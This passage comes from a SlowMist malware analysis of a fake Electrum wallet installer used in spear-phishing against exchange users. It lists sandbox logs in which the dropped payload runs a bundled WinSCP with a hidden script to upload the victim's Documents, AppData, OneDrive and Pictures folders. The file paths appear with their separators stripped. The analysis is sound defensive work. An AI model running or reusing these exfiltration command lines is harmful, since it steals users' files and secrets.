SlowMist: Technical Analysis of the Fake Electrum Spear-Phishing Attack Targeting Exchange Users (2)

Time: 2020-06-11 16:42  Source: unknown  Author: admin

  (4) Behavior description: Create new file process

  Details:

  [0x00000c30]ImagePath = C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe, CmdLine = "C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe" /ini=null /script="script.txt" /log="winscp_documents.log" /loglevel=0 /parameter "C:Documents and SettingsAdministratorMy Documents" "09-06-2020-4:51:51_documents"

  [0x00000c44]ImagePath = C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe, CmdLine = "C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe" /ini=null /script="script.txt" /log="winscp_appdata.log" /loglevel=0 /parameter "C:Documents and SettingsAdministratorApplication Data" "09-06-2020-4:51:51_appdata"

  [0x00000c5c]ImagePath = C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe, CmdLine = "C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe" /ini=null /script="script.txt" /log="winscp_localappdata.log" /loglevel=0 /parameter "C:Documents and SettingsAdministratorLocal SettingsApplication Data" "09-06-2020-4:51:51_localappdata"

  [0x00000c64]ImagePath = C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe, CmdLine = "C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe" /ini=null /script="script.txt" /log="winscp_onedrive.log" /loglevel=0 /parameter "C:Documents and SettingsAdministratorOneDrive" "09-06-2020-4:51:51_onedrive"

  [0x00000c6c]ImagePath = C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe, CmdLine = "C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe" /ini=null /script="script.txt" /log="winscp_pictures.log" /loglevel=0 /parameter "C:Documents and SettingsAdministratorPictures" "09-06-2020-4:51:51_pictures"

  (5) File behavior

  Behavior description: Create file

  Details:

  C:Documents and SettingsAdministratorLocal SettingsTempsi9.tmp
  C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_filesWinSCP.exe
  C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_filesscript.txt
  C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_filessetup.exe
  C:Documents and SettingsAdministratorLocal SettingsTempsyA.tmp
  C:Documents and SettingsAdministratorLocal SettingsTempsyA.tmpSystem.dll
  C:Documents and SettingsAdministratorApplication Datawinscp.rnd
  C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_fileswinscp_appdata.log
  C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_fileswinscp_onedrive.log
  C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_fileswinscp_localappdata.log
  C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_fileswinscp_documents.log
  C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_fileswinscp_pictures.log
  C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_filesull

   (Editor in charge: admin1)
